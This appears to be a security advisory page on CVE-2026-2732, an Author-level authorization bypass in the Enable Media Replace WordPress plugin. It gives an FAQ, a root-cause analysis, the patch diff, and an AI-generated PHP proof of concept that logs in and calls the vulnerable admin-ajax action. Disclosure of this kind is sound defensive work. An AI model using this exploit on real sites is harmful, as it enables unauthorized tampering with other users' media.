What is CVE-2026-2732?

CVE-2026-2732 is a security vulnerability in the Enable Media Replace plugin for WordPress, affecting versions up to and including 4.1.7. It allows authenticated users with Author-level access or higher to replace any media attachment without proper authorization checks.

How does CVE-2026-2732 work?

The vulnerability arises from an improper capability check in the RemoveBackgroundViewController::load function. This function allows users to send a request to replace media attachments without verifying if they have permission to modify the specified attachment.

Who is affected by this vulnerability?

Any WordPress site using the Enable Media Replace plugin version 4.1.7 or earlier is affected. Specifically, authenticated users with Author-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Enable Media Replace plugin installed. If it is version 4.1.7 or earlier, your site is at risk of exploitation.

How can I mitigate CVE-2026-2732?

The vulnerability can be mitigated by updating the Enable Media Replace plugin to version 4.1.8 or later, where proper authorization checks have been implemented.

What is the severity level of CVE-2026-2732?

CVE-2026-2732 has a medium severity rating with a CVSS score of 5.4. This indicates a moderate risk where exploitation could lead to unauthorized changes to media attachments.

What does the CVSS score mean in practical terms?

A CVSS score of 5.4 suggests that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and modification of media files, potentially impacting site integrity.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can authenticate as an Author user and send crafted requests to replace any media attachment. This demonstrates the lack of authorization checks that allow for unauthorized modifications.

What changes were made in the patched version?

In version 4.1.8, the plugin was updated to include proper authorization checks in the RemoveBackgroundViewController.php file. These checks ensure that only users with the appropriate permissions can modify attachments.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider restricting access to the WordPress admin area or limiting user roles until the patch can be applied. Additionally, monitor for any suspicious activity related to media attachments.

Are there any other vulnerabilities related to this plugin?

While CVE-2026-2732 is a specific vulnerability, it is essential to keep the Enable Media Replace plugin and all other plugins updated to mitigate potential security risks. Regularly review security advisories for any new vulnerabilities.

How can I stay informed about vulnerabilities like CVE-2026-2732?

To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) or other security advisories related to WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2732: Enable Media Replace <= 4.1.7 – Improper Authorization to Authenticated (Author+) Arbitrary Attachment Change via Background Replace (enable-media-replace)

CVE ID CVE-2026-2732

Plugin enable-media-replace

Severity Medium (CVSS 5.4)

CWE 862

Vulnerable Version 4.1.7

Patched Version 4.1.8

Disclosed March 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2732:
The vulnerability exists in the Enable Media Replace WordPress plugin versions up to and including 4.1.7. The root cause is an improper capability check in the RemoveBackgroundViewController::load function. This function handles background removal requests but fails to verify that the current user has permission to modify the target attachment. The vulnerable code path begins when an authenticated user with Author-level access or higher sends a POST request to the WordPress admin-ajax.php endpoint with action ’emr_remove_background_load’. The request includes an attachment_id parameter. The load function at line 37 in RemoveBackgroundViewController.php receives this request, converts the attachment_id to an integer via intval($_REQUEST[‘attachment_id’]), and retrieves the post object via get_post(). No authorization check occurs before this point, allowing the user to specify any attachment ID in the system.

The exploitation method requires an attacker with at least Author-level WordPress privileges. They craft a POST request to /wp-admin/admin-ajax.php with action=emr_remove_background_load and attachment_id set to the ID of any media attachment, regardless of ownership. The plugin processes this request and returns the background removal interface for the specified attachment. The attacker can then submit a second request to the emr_remove_background_replace action with ID parameter set to the target attachment ID and a valid removal key. This replaces the original attachment file with a background-removed version, effectively modifying media they do not own.

The patch adds proper authorization checks in two locations within RemoveBackgroundViewController.php. At line 40, after retrieving the attachment post object, the patch inserts a call to emr()->checkImagePermission($attachment). This function verifies the current user has permission to modify the attachment based on authorship. A similar check appears at line 94 in the same file for the replace operation. The patch also modifies the plugin initialization in emr-plugin.php, changing the runtime hook from plugins_loaded to init to ensure user authentication data is available. If exploited, this vulnerability allows authors to modify any media attachment on the site, potentially defacing content, removing important visual elements, or disrupting media-dependent functionality.

Differential between vulnerable and patched code

Code Diff

--- a/enable-media-replace/build/shortpixel/filesystem/src/Model/File/FileModel.php
+++ b/enable-media-replace/build/shortpixel/filesystem/src/Model/File/FileModel.php
@@ -193,20 +193,7 @@
     return filemtime($this->fullpath);
   }

-  public function hasBackup()
-  {
-      $directory = $this->getBackupDirectory();
-      if (! $directory)
-        return false;

-      $backupFile =  $directory . $this->getFileName();
-
-      if (file_exists($backupFile) && ! is_dir($backupFile) )
-        return true;
-      else {
-        return false;
-      }
-  }


   /** Returns the Directory Model this file resides in
@@ -521,7 +508,7 @@
      $this->is_virtual = true;

 		 // This filter checks if some supplier will be able to handle the file when needed.
-     $path = apply_filters('shortpixel/image/urltopath', false, $url);
+     $path = apply_filters('shortpixel/image/urltopath', false, $url, $this->getRawFullPath());

 		 if ($path !== false)
      {
--- a/enable-media-replace/build/shortpixel/log/src/DebugItem.php
+++ b/enable-media-replace/build/shortpixel/log/src/DebugItem.php
@@ -32,7 +32,7 @@
         if (is_object($this->message) || is_array($this->message))
         {
           $data[] = $this->message;
-          $this->message = __('[Data]');
+          $this->message = __('[Data]', 'enable-media-replace/');
         }
         if (is_array($data) && count($data) > 0)
         {
--- a/enable-media-replace/build/shortpixel/notices/src/NoticeModel.php
+++ b/enable-media-replace/build/shortpixel/notices/src/NoticeModel.php
@@ -274,11 +274,11 @@
     {
       $output .= '<div class="details-wrapper">
       <input type="checkbox" name="detailhider" id="check-' . $id .'">
-      <label for="check-' . $id . '"  class="show-details"><span>' . __('See Details', 'shortpixel-image-optimiser')   . '</span>
+      <label for="check-' . $id . '"  class="show-details"><span>' . __('See Details', 'enable-media-replace/')   . '</span>
       </label>';

       $output .= "<div class='detail-content-wrapper'><p class='detail-content'>" . $this->parseDetails() . "</p></div>";
-      $output .= '<label for="check-' . $id . '" class="hide-details"><span>' . __('Hide Details', 'shortpixel-image-optimiser') . '</span></label>';
+      $output .= '<label for="check-' . $id . '" class="hide-details"><span>' . __('Hide Details', 'enable-media-replace/') . '</span></label>';

       $output .= '</div>'; // detail wrapper

@@ -287,7 +287,7 @@

     if ($this->is_removable)
     {
-			      $output .= '<button type="button" id="button-' . $id . '" class="notice-dismiss" data-dismiss="' . $this->suppress_period . '" ><span class="screen-reader-text">' . __('Dismiss this notice', 'shortpixel-image-optimiser') . '</span></button>';
+			      $output .= '<button type="button" id="button-' . $id . '" class="notice-dismiss" data-dismiss="' . $this->suppress_period . '" ><span class="screen-reader-text">' . __('Dismiss this notice', 'enable-media-replace/') . '</span></button>';

        if (! $this->is_persistent)
        {
--- a/enable-media-replace/classes/Controller/ReplaceController.php
+++ b/enable-media-replace/classes/Controller/ReplaceController.php
@@ -194,8 +194,8 @@
 			do_action('emr/converter/prevent-offload', $this->post_id);
       $target_metadata = wp_generate_attachment_metadata( $this->post_id, $this->targetFile->getFullPath() );
 			do_action('emr/converter/prevent-offload-off', $this->post_id);
-      wp_update_attachment_metadata( $this->post_id, $target_metadata );

+      wp_update_attachment_metadata( $this->post_id, $target_metadata );

 			$Replacer->setTargetMeta($target_metadata);
 			//$this->target_metadata = $metadata;
@@ -248,8 +248,11 @@
           'thumbnails_only' => ($this->replaceType == self::MODE_SEARCHREPLACE) ? false : true,
       );

-			$Replacer->replace($args);
-
+			$doreplace = apply_filters('emr/replace/doreplace', true);
+			if(true === $doreplace){
+				$Replacer->replace($args);
+			}
+
 			// Here Updatedata and a ffew others.
 			$this->updateDate();

--- a/enable-media-replace/classes/ViewController/RemoveBackgroundViewController.php
+++ b/enable-media-replace/classes/ViewController/RemoveBackgroundViewController.php
@@ -37,10 +37,15 @@
 			// wp_die(esc_html__('You do not have permission to upload files.', 'enable-media-replace'));
 	 }

-
 	 $attachment_id = intval($_REQUEST['attachment_id']);
 	 $attachment = get_post($attachment_id);

+	 if (! emr()->checkImagePermission($attachment))
+	 {
+		 $this->viewError(self::ERROR_IMAGE_PERMISSION);
+	   wp_die( esc_html__('You do not have permission to upload files for this author.', 'enable-media-replace') );
+	 }
+
 	 $uiHelper = emr()->uiHelper();
 	 $uiHelper->setPreviewSizes();
 	 $uiHelper->setSourceSizes($attachment_id);
@@ -77,30 +82,34 @@
 		 if (is_null($key) || strlen($key) == 0)
 		 {
 			 $this->viewError(self::ERROR_KEY);
-			 //wp_die(esc_html__('Error while sending form (no key). Please try again.', 'enable-media-replace'));
 		 }

 		 $post_id = isset($_POST['ID']) ? intval($_POST['ID']) : null; // sanitize, post_id.
 		 if (is_null($post_id)) {
 			 	 $this->viewError(self::ERROR_FORM);
-//		     wp_die(esc_html__('Error in request. Please try again', 'enable-media-replace'));
 		 }

+		 $attachment = get_post($post_id);
+
+		 if (! emr()->checkImagePermission($attachment))
+		 {
+			 $this->viewError(self::ERROR_IMAGE_PERMISSION);
+		   wp_die( esc_html__('You do not have permission to upload files for this author.', 'enable-media-replace') );
+		 }
+
 		 $this->setView($post_id);
 		 $result = $this->replaceBackground($post_id, $key);

 		 if (false === $result->success)
 		 {
 			  $this->view->errorMessage = $result->message;
-				$this->viewError();
+				$this->viewError(self::ERROR_DOWNLOAD_FAILED);
 		 }
 		 elseif (! file_exists($result->image))
 		 {
 			 $this->viewError(self::ERROR_DOWNLOAD_FAILED);
 		 }

-//		 $result = $replacer->replaceWith($result->image, $source->getFileName() , true);
-//$params = array();
 		$replaceController = new ReplaceController($post_id);
 		$sourceFile = $replaceController->getSourceFile();

--- a/enable-media-replace/classes/ViewController/UploadViewController.php
+++ b/enable-media-replace/classes/ViewController/UploadViewController.php
@@ -90,6 +90,8 @@
 		{
 			 $this->viewSuccess();
 		}
+
+
 	 }


--- a/enable-media-replace/classes/emr-plugin.php
+++ b/enable-media-replace/classes/emr-plugin.php
@@ -21,7 +21,8 @@

     public function __construct()
     {
-        add_action('plugins_loaded', array($this, 'runtime')); //lowInit, before theme setup!
+        add_action('init', array($this, 'runtime'));
+       // add_action('init', [$this, 'init']);  // init for user authentication, not set on plugins_loaded.
 				add_action('admin_init', array($this, 'adminInit')); // adminInit, after functions.php
     }

@@ -29,29 +30,35 @@
     {
          $this->nopriv_plugin_actions();

-        if (EMR_CAPABILITY !== false) {
-            if (is_array(EMR_CAPABILITY)) {
-                $this->general_cap = EMR_CAPABILITY[0];
-                $this->user_cap = EMR_CAPABILITY[1];
-
-                if (! current_user_can($this->general_cap) && ! current_user_can($this->user_cap)) {
-                    return;
-                }
-            } else {
-                $this->general_cap = EMR_CAPABILITY;
-                if (! current_user_can($this->general_cap)) {
-                    return;
-                }
-            }
-        } elseif (! current_user_can('upload_files')) {
-            return;
-        }
-
+         if (EMR_CAPABILITY !== false) {
+          if (is_array(EMR_CAPABILITY)) {
+              $this->general_cap = EMR_CAPABILITY[0];
+              $this->user_cap = EMR_CAPABILITY[1];
+
+              if (! current_user_can($this->general_cap) && ! current_user_can($this->user_cap)) {
+                  return;
+              }
+          } else {
+              $this->general_cap = EMR_CAPABILITY;
+              if (! current_user_can($this->general_cap)) {
+                  return;
+              }
+          }
+      } elseif (false === current_user_can('upload_files')) {
+          return;
+      }
+
 				new Externals();

         $this->plugin_actions(); // init
     }

+    public function init()
+    {
+
+
+    }
+
 		public function adminInit()
 		{
 			$this->features['replace']  = true; // does nothing just for completeness
@@ -290,11 +297,11 @@
   */
     public function admin_scripts()
     {
-        if (is_rtl()) {
-            wp_register_style('emr_style', plugins_url('css/admin.rtl.css', EMR_ROOT_FILE));
+       if (is_rtl()) {
+            wp_register_style('emr_style', plugins_url('css/rtl/admin.css', EMR_ROOT_FILE));
         } else {
             wp_register_style('emr_style', plugins_url('css/admin.css', EMR_ROOT_FILE));
-        }
+       }

         wp_register_style('emr_edit-attachment', plugins_url('css/edit_attachment.css', EMR_ROOT_FILE));

--- a/enable-media-replace/classes/external/upgrader_skin.php
+++ b/enable-media-replace/classes/external/upgrader_skin.php
@@ -1,102 +0,0 @@
-<?php
-
-
-/**
- * Skin class.
- *
- * @since 1.0.0
- *
- * @package Envira_Gallery
- * @author  Envira Team
- */
-class EMR_Envira_Gallery_Skin extends WP_Upgrader_Skin {
-
-	/**
-	 * Primary class constructor.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param array $args Empty array of args (we will use defaults).
-	 */
-	public function __construct( $args = array() ) {
-
-		parent::__construct();
-
-	}
-
-	/**
-	 * Set the upgrader object and store it as a property in the parent class.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param object $upgrader The upgrader object (passed by reference).
-	 */
-	public function set_upgrader( &$upgrader ) {
-
-		if ( is_object( $upgrader ) ) {
-			$this->upgrader =& $upgrader;
-		}
-
-	}
-
-	/**
-	 * Set the upgrader result and store it as a property in the parent class.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param object $result The result of the install process.
-	 */
-	public function set_result( $result ) {
-
-		$this->result = $result;
-
-	}
-
-	/**
-	 * Empty out the header of its HTML content and only check to see if it has
-	 * been performed or not.
-	 *
-	 * @since 1.0.0
-	 */
-	public function header() {}
-
-	/**
-	 * Empty out the footer of its HTML contents.
-	 *
-	 * @since 1.0.0
-	 */
-	public function footer() {}
-
-	/**
-	 * Instead of outputting HTML for errors, json_encode the errors and send them
-	 * back to the Ajax script for processing.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param array $errors Array of errors with the install process.
-	 */
-	public function error( $errors ) {
-
-		if ( ! empty( $errors ) ) {
-			echo wp_json_encode( array( 'error' => __( 'There was an error installing the addon. Please try again.', 'envira-gallery' ) ) );
-			/* log this for API issues */
-
-			error_log( print_r( $errors, true ) );
-
-			die;
-		}
-
-	}
-
-	/**
-	 * Empty out the feedback method to prevent outputting HTML strings as the install
-	 * is progressing.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param string $string The feedback string.
-	 * @param array  ...$args The args.
-	 */
-	public function feedback( $string, ...$args ) {}
-
-}
--- a/enable-media-replace/classes/external/upsell_installer.php
+++ b/enable-media-replace/classes/external/upsell_installer.php
@@ -12,27 +12,30 @@
 	if ( ! current_user_can('install_plugins'))
 	{
 		// Send back a response.
-		wp_send_json(array('result'=> false));
+
+		wp_send_json(array('result'=> false, 'message' => 'Install permission issue'));
 		die;
 	}

 	switch($plugin)
 	{
 		 case "envira":
-		    $download_url = 'https://downloads.wordpress.org/plugin/envira-gallery-lite.zip';
+			$download_url = 'https://downloads.wordpress.org/plugin/envira-gallery-lite.zip';
 		 break;
 		 case 'spio':
-		 		$download_url = 'https://downloads.wordpress.org/plugin/shortpixel-image-optimiser.zip';
+			$download_url = 'https://downloads.wordpress.org/plugin/shortpixel-image-optimiser.zip';
 		 break;
 		 case 'spai':
-		 	 $download_url = 'https://downloads.wordpress.org/plugin/shortpixel-adaptive-images.zip';
+			$download_url = 'https://downloads.wordpress.org/plugin/shortpixel-adaptive-images.zip';
+		 break;
+		 case 'fp':
+			$download_url = 'https://downloads.wordpress.org/plugin/fastpixel-website-accelerator.zip';
 		 break;
 	}

 	// Install the addon.
 	if ( ! is_null($download_url ) ) {

-		//$download_url = esc_url_raw( wp_unslash( $_POST['plugin'] ) );
 		global $hook_suffix;

 		// Set the current screen to avoid undefined notices.
@@ -42,7 +45,6 @@
 		$method = '';
 		$url    = add_query_arg(
 			array(
-			//	'page' => 'envira-gallery-settings',
 			),
 			admin_url( 'admin.php' )
 		);
@@ -68,10 +70,9 @@

 		// We do not need any extra credentials if we have gotten this far, so let's install the plugin.
 		require_once (ABSPATH . 'wp-admin/includes/class-wp-upgrader.php');
-		require_once (plugin_dir_path( EMR_ROOT_FILE ) . 'classes/external/upgrader_skin.php');

 		// Create the plugin upgrader with our custom skin.
-		$skin      = new EMR_Envira_Gallery_Skin();
+		$skin      = new Automatic_Upgrader_Skin();
 		$installer = new Plugin_Upgrader( $skin );
 		$installer->install( $download_url );

@@ -81,7 +82,7 @@
 		if ( $installer->plugin_info() ) {
 			$plugin_basename = $installer->plugin_info();

-		ob_clean();
+		ob_end_clean();


 			wp_send_json_success( array( 'plugin' => $plugin_basename ) );
@@ -91,7 +92,7 @@
 	}

 	// Send back a response.
-	wp_send_json(array('result'=> false));
+	wp_send_json(array('result'=> false, 'download url issue'));
 	die;

 }
@@ -127,7 +128,10 @@
 			$plugin = 'shortpixel-image-optimiser/wp-shortpixel.php';
 	 break;
 	 case 'spai':
-		 $plugin = 'shortpixel-adaptive-images/short-pixel-ai.php';
+			$plugin = 'shortpixel-adaptive-images/short-pixel-ai.php';
+	 break;
+	 case 'fp':
+			$plugin = 'fastpixel-website-accelerator/fastpixel.php';
 	 break;
 }

--- a/enable-media-replace/classes/external/wp-offload.php
+++ b/enable-media-replace/classes/external/wp-offload.php
@@ -206,16 +206,15 @@
 					 return;
 				}

-
 				$original_path = $item->original_path(); // Original path (non-scaled-)
 				$original_source_path = $item->original_source_path();
 				$path = $item->path();
 				$source_path = $item->source_path();

 				$wp_original = wp_get_original_image_path($post_id, apply_filters( 'emr_unfiltered_get_attached_file', true ));
+
 				$wp_original = apply_filters('emr/replace/original_image_path', $wp_original, $post_id);
 				$wp_source = trim(get_attached_file($post_id, apply_filters( 'emr_unfiltered_get_attached_file', true )));
-
 				$updated = false;

 				// If image is replaced with another name, the original soruce path will not match.  This could also happen when an image is with -scaled as main is replaced by an image that doesn't have it.  In all cases update the table to reflect proper changes.
@@ -232,6 +231,7 @@
 					 $item->set_original_source_path($newpath);

 					 $item->save();
+
 				}
 		}

--- a/enable-media-replace/enable-media-replace.php
+++ b/enable-media-replace/enable-media-replace.php
@@ -3,7 +3,7 @@
  * Plugin Name: Enable Media Replace
  * Plugin URI: https://shortpixel.com
  * Description: Enable replacing media files by uploading a new file in the "Edit Media" section of the WordPress Media Library.
- * Version: 4.1.7
+ * Version: 4.1.8
  * Author: ShortPixel
  * Author URI: https://shortpixel.com
  * GitHub Plugin URI: https://github.com/short-pixel-optimizer/enable-media-replace
@@ -25,24 +25,17 @@
  *
  */

-define( 'EMR_VERSION', '4.1.7' );
+define( 'EMR_VERSION', '4.1.8' );

 if ( ! defined( 'ABSPATH' ) ) {
 	exit; // Exit if accessed directly.
 }

-/* Not sure why we define this?
-if(!defined("S3_UPLOADS_AUTOENABLE")) {
-	define('S3_UPLOADS_AUTOENABLE', true);
-} */

 if ( ! defined( 'EMR_ROOT_FILE' ) ) {
 	  define( 'EMR_ROOT_FILE', __FILE__ );
 }

-if ( ! defined( 'SHORTPIXEL_AFFILIATE_CODE' ) ) {
-	define( 'SHORTPIXEL_AFFILIATE_CODE', 'VKG6LYN28044' );
-}

 /** Usage:
 * Define in wp-config.php
--- a/enable-media-replace/views/success.php
+++ b/enable-media-replace/views/success.php
@@ -18,9 +18,11 @@

 	<p><?php _e('Your image has been successfully replaced!', 'enable-media-replace'); ?></p>

-	<p><?php _e('Did you know that you can also optimize the images on your website to make them load faster?', 'enable-media-replace'); ?></p>
+	<?php if (apply_filters('emr/upsell', current_user_can('install_plugins'))) { ?>
+		<p><?php _e('Did you know that you can also optimize the images on your website to make them load faster?', 'enable-media-replace'); ?></p>

-	<p><?php printf(esc_html__('Try the %sShortPixel Image Optimizer%s plugin!', 'enable-media-replace'), '<a href="https://wordpress.org/plugins/shortpixel-image-optimiser/" target="_blank">', '</a>'); ?></p>
+		<p><?php printf(esc_html__('Try the %sShortPixel Image Optimizer%s plugin!', 'enable-media-replace'), '<a href="https://wordpress.org/plugins/shortpixel-image-optimiser/" target="_blank">', '</a>'); ?></p>
+	<?php } ?>

 	<p><?php _e('You will be redirect to the image screen in a few seconds.', 'enable-media-replace');
 		printf(esc_html__('( %s ) or %s click here to continue %s', 'enable-media-replace'), '<span id="redirect_counter"></span>',
--- a/enable-media-replace/views/upsell.php
+++ b/enable-media-replace/views/upsell.php
@@ -20,6 +20,9 @@
 	$spai_installed = isset($plugins['shortpixel-adaptive-images/short-pixel-ai.php']);
 	$spai_active = is_plugin_active('shortpixel-adaptive-images/short-pixel-ai.php');

+	$fp_installed = isset($plugins['fastpixel-website-accelerator/fastpixel.php']);
+	$fp_active = is_plugin_active('fastpixel-website-accelerator/fastpixel.php');
+
 	$envira_installed = isset($plugins['envira-gallery-lite/envira-gallery-lite.php']);
 	$envira_active = is_plugin_active('envira-gallery-lite/envira-gallery-lite.php');
 	$envira_pro_active = is_plugin_active('envira-gallery/envira-gallery.php');
@@ -39,11 +42,13 @@
           <img width="40" height="40" src="<?php echo emr()->getPluginURL('img/sp-logo-regular.svg') ?>" alt="ShortPixel">
       </div>
 			<h4 class="grey">
-		     <?php echo esc_html__("ShortPixel Image Optimizer", "enable-media-replace"); ?>
+		    <?php echo esc_html__("ShortPixel Image Optimizer", "enable-media-replace"); ?>
 			 </h4>
-			<h3 class="red ucase"><?php _e('Is your website slow?', 'enable-media-replace'); ?></h3>
-			<br>
-			<h3 class="cyan ucase"><?php printf(__('Optimize all images %s automatically', 'enable-media-replace'), '<br>'); ?></h3>
+			<h3 class="cyan ucase"><?php _e('Unlimited Image Optimizations', 'enable-media-replace'); ?></h3>
+			</br>
+			<h3 class="cyan ucase"><?php _e('Unlimited AI Captioning', 'enable-media-replace'); ?></h3>
+			</br>
+			<h3 class="cyan ucase"><?php _e('Unlimited Background removal', 'enable-media-replace'); ?></h3>
       <p class='button-wrapper '>
 			<?php
 			  $install_class = (! $spio_installed) ? '' : 'hidden';
@@ -64,7 +69,42 @@
 	<?php endif; ?>
 	<!--- // SHORTPIXEL -->

-		<!--- SHORTPIXEL AI -->
+
+		<!--- FASTPIXEL -->
+    <?php if(! $fp_active): ?>
+
+    <div class='shortpixel-offer fp'>
+      <div class='img-wrapper'>
+          <img width="150" height="" src="<?php echo esc_url(emr()->getPluginURL('img/fastpixel-logo.svg')) ?>" alt="FastPixel">
+      </div>
+			<h4 class="grey">
+		     <?php echo esc_html__("FastPixel Website Accelerator", "enable-media-replace"); ?>
+			 </h4>
+
+
+			<h3 class="cyan ucase"><?php printf(__('Faster WordPress', 'enable-media-replace')); ?></h3>
+			<h3 class="red ucase"><?php _e('Made Easy', 'enable-media-replace'); ?></h3>
+      <p class='button-wrapper '>
+			<?php
+			  $install_class = (! $fp_installed) ? '' : 'hidden';
+				$activate_class = ($fp_installed && ! $fp_active) ? '' : 'hidden';
+			?>
+					<a class="emr-installer <?php echo $install_class ?>"  data-action="install" data-plugin="fp" href="javascript:void(0)">
+						<?php _e('INSTALL NOW', 'enable-media-replace') ?>
+					</a>
+
+				<a class='emr-activate <?php echo $activate_class ?>' data-action="activate" data-plugin="fp" href="javascript:void(0)">
+					<?php _e('ACTIVATE', 'enable-media-replace') ?>
+				</a>
+
+				<h4 class='emr-activate-done hidden' data-plugin='fp'><?php _e('FastPixel activated!', 'enable-media-replace'); ?></h4>
+			</p>
+
+    </div>
+	<?php endif; ?>
+	<!--- // FASTPIXEL -->
+
+		<!--- SHORTPIXEL AI
     <?php if(! $spai_active): ?>

     <div class='shortpixel-offer spai'>
@@ -98,73 +138,4 @@
 	<?php endif; ?>
 	<!--- // SHORTPIXEL AI -->

-  <!--- Shortpixel THEME -->
-	<div class='shortpixel-offer theme-offer'>
-		<p><a href="https://wordpress.org/themes/superb-pixels/" target="_blank"><img src="<?php echo esc_url(emr()->getPluginURL('img/sp-banner-theme.jpg')); ?>" alt='ShortPixel Theme' ></a></p>
-
-	</div>
-	<!--- // Shortpixel THEME -->
-
-	<!--- WPSO -->
-	<?php /*
-    <div class='shortpixel-offer site-speed'>
-      <p class='img-wrapper'><img width="40" height="40" src="<?php echo emr()->getPluginURL('img/sp-logo-wink.svg'); ?>" alt='ShortPixel'></p>
-      <h3><?php printf(__('GET AN ASSESSMENT FOR %s YOUR WEBSITE %s AND %s %s FIND OUT HOW TO MAKE IT FASTER %s', 'enable-media-replace'),'<br>', '<br>','<br>', '<span class="red">','</span>'); ?></h3>
-
-      <p class='button-wrapper'><a href='https://wso.shortpixel.com/?utm_source=EMR' target="_blank"><?php _e('FIND OUT MORE', 'enable-media-replace') ?></a></p>
-    </div>
-*/ ?>
-	<!--- // WPSO -->
-
-
-
-		<!--- ENVIRA temprary deactivated
-		<?php if (! $envira_pro_active): ?>
-  <div class='envira-shortpixel-install shortpixel-offer'>
-
-	<p class='img-wrapper'><img src="<?php echo emr()->getPluginURL('img/envira-logo.png'); ?>" alt='Envira Gallery'></p>
-	<p><?php esc_html_e('Create beautiful, fast-loading photo & video galleries for your site in minutes.', 'enable-media-replace' ); ?></p>
-
-		 <?php
-			  $install_class = (! $envira_installed) ? '' : 'hidden';
-				$activate_class = ($envira_installed && ! $envira_active) ? '' : 'hidden';
-		 ?>
-		 <?php if (! $envira_active) { ?>
-	   <p class='button-wrapper envira-emr-button-wrap'>
-
-			 <a class="emr-installer button button-envira-emr emr-install-envira <?php echo $install_class ?>"  data-action="install" data-plugin="envira" href='javascript:void(0)'><?php _e('Install now', 'enable-media-replace') ?></a>
-
-			 <a class="emr-activate button button-envira-emr emr-activate-envira <?php echo $activate_class ?>" href='javascript:void(0)' data-action="activate" data-plugin="envira" ><?php _e('Activate', 'enable-media-replace') ?></a>
-
-				<h4 class='emr-activate-done hidden' data-plugin='envira'><?php _e('Envira Gallery activated!', 'enable-media-replace'); ?></h4>
-
-		</p>
-
-		<?php } else {
-				if ( is_plugin_active( 'envira-gallery-lite/envira-gallery-lite.php' ) ) {
-			?>
-				<p class='button-wrapper envira-emr-button-wrap'><a class="button button-envira-emr" href='https://enviragallery.com/pricing' target="_blank"><?php _e('Get Pro', 'enable-media-replace') ?></a></p>
-
-				<?php } else { ?>
-
-				<?php }
-			} ?>
-    </div>
-    <style>
-	    .envira-emr-button-wrap {
-		text-align: center;
-	}
-	.button-envira-emr {
-		background-color: #7cc048 !important;
-		border: none !important;
-		color: rgb(255,255,255) !important;
-		font-size: 21px !important;
-	}
-	.button-envira-emr:hover {
-		background-color: #95dc5e !important;
-	}
-    </style>
-	<?php endif; // envira ?>
--->
-
 </section>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2732 - Enable Media Replace <= 4.1.7 - Improper Authorization to Authenticated (Author+) Arbitrary Attachment Change via Background Replace

<?php

$target_url = 'https://vulnerable-site.com';
$username = 'author_user';
$password = 'author_password';
$target_attachment_id = 123; // ID of attachment to replace

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
$response = curl_exec($ch);

// Step 2: Trigger the vulnerable load function to get interface
$post_data = [
    'action' => 'emr_remove_background_load',
    'attachment_id' => $target_attachment_id
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

// The response should contain the background removal interface
// This demonstrates the unauthorized access to another user's attachment
// Note: Full exploitation requires a valid removal key from ShortPixel service
// which is not included in this PoC

echo "Vulnerable endpoint accessed. Response length: " . strlen($response) . "n";
if (strpos($response, 'emr-remove-background') !== false) {
    echo "SUCCESS: Unauthorized access to attachment ID $target_attachment_id confirmed.n";
}

curl_close($ch);
unlink('cookies.txt');

?>

Frequently Asked Questions

What is CVE-2026-2732?
Overview of the vulnerability
CVE-2026-2732 is a security vulnerability in the Enable Media Replace plugin for WordPress, affecting versions up to and including 4.1.7. It allows authenticated users with Author-level access or higher to replace any media attachment without proper authorization checks.
How does CVE-2026-2732 work?
Mechanics of the vulnerability
The vulnerability arises from an improper capability check in the RemoveBackgroundViewController::load function. This function allows users to send a request to replace media attachments without verifying if they have permission to modify the specified attachment.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Enable Media Replace plugin version 4.1.7 or earlier is affected. Specifically, authenticated users with Author-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the Enable Media Replace plugin installed. If it is version 4.1.7 or earlier, your site is at risk of exploitation.
How can I mitigate CVE-2026-2732?
Fixing the vulnerability
The vulnerability can be mitigated by updating the Enable Media Replace plugin to version 4.1.8 or later, where proper authorization checks have been implemented.
What is the severity level of CVE-2026-2732?
Understanding the risk
CVE-2026-2732 has a medium severity rating with a CVSS score of 5.4. This indicates a moderate risk where exploitation could lead to unauthorized changes to media attachments.
What does the CVSS score mean in practical terms?
Interpreting the CVSS score
